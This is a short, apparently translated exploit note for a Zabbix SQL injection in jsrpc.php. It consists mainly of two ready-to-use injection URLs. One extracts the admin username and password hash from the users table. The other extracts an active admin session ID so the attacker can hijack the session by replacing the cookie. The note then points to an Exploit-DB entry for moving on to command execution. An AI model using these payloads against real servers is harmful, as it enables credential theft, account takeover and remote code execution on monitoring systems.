FREEBUF burst Zabbix SQL injection: http://www.freebuf.com/vuls/112197.html
Vulnerability testing:
User name and password:
http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&
timestamp
=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(
select (1)
from users
where 1=1
aNd (
SELECT 1
FROM (
select count
(*),concat(floor(rand(0)*2),(
substring
((
Select (
select concat(alias,0x7e,passwd,0x7e)
from users limit 1)),1,62)))a
from information_schema.tables
group by a)b))&updateProfile=
true
&period=3600&stime=20160817050632&resourcetype=17
|
Burst SessionID (Replaceable refresh Login-the session ID in the replacement cookie)
http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&
timestamp
=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(
select (1)
from users
where 1=1
aNd (
SELECT 1
FROM (
select count
(*),concat(floor(rand(0)*2),(
substring
((
Select (
select concat(sessionid,0x7e,userid,0x7e,status)
from sessions
where status=0
and userid=1 LIMIT 0,1)),1,62)))a
from information_schema.tables
group by a)b))&updateProfile=
true
&period=3600&stime=20160817050632&resourcetype=17
|
With this login command to execute using https://www.exploit-db.com/exploits/39937/
Zabbix Latest SQL injection exploit